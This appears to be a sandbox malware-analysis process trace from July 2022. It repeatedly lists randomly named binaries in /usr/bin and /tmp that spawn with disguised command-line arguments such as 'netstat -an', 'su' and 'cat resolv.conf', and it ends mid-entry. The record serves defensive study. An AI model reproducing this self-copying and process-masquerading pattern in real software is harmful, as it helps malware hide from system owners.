                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:/usr/bin/wgerzwaeqg ls 9446
                                                            File size:625900 bytes
                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:/usr/bin/wgerzwaeqg uptime 9446
                                                            File size:625900 bytes
                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:/usr/bin/wgerzwaeqg "sleep 1" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:/usr/bin/chvtxqzhiw "cat resolv.conf" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:/usr/bin/chvtxqzhiw gnome-terminal 9446
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:/usr/bin/chvtxqzhiw ifconfig 9446
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:/usr/bin/chvtxqzhiw bash 9446
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:/usr/bin/chvtxqzhiw top 9446
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/chvtxqzhiw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:95a3baa8a504f487595262f5f028bf8e

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:/usr/bin/qwevskbjgs su 9446
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:/usr/bin/qwevskbjgs "route -n" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:/usr/bin/qwevskbjgs pwd 9446
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:/usr/bin/qwevskbjgs uptime 9446
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:/usr/bin/qwevskbjgs "sleep 1" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:30
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwevskbjgs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:c3ba5c7cde48244ebce7e6220e2b27fd

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:/usr/bin/kztofeuxtk su 9446
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:/usr/bin/kztofeuxtk "netstat -an" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:/usr/bin/kztofeuxtk who 9446
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:/usr/bin/kztofeuxtk "netstat -an" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:/usr/bin/kztofeuxtk uptime 9446
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:35
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kztofeuxtk
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:62ca1425a6696323f767d20d3413c202

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:/usr/bin/tihvbqlbyh ifconfig 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:/usr/bin/tihvbqlbyh sh 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:/usr/bin/tihvbqlbyh su 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:/usr/bin/tihvbqlbyh "cd /etc" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:/usr/bin/tihvbqlbyh "echo \"find\"" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:40
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tihvbqlbyh
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a151b9cf6355b8e27d8585ffa77f259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:/usr/bin/evsgasjgju "ps -ef" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:/usr/bin/evsgasjgju id 9446
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:/usr/bin/evsgasjgju who 9446
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:/usr/bin/evsgasjgju "route -n" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:/usr/bin/evsgasjgju whoami 9446
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:45
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/evsgasjgju
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:a99a5cd9581ce3735104776f185cd259

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
                                                            Arguments:/usr/bin/jyfcwmvcim pwd 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
                                                            Arguments:/usr/bin/jyfcwmvcim whoami 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
                                                            Arguments:/usr/bin/jyfcwmvcim "cat resolv.conf" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
                                                            Arguments:/usr/bin/jyfcwmvcim id 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
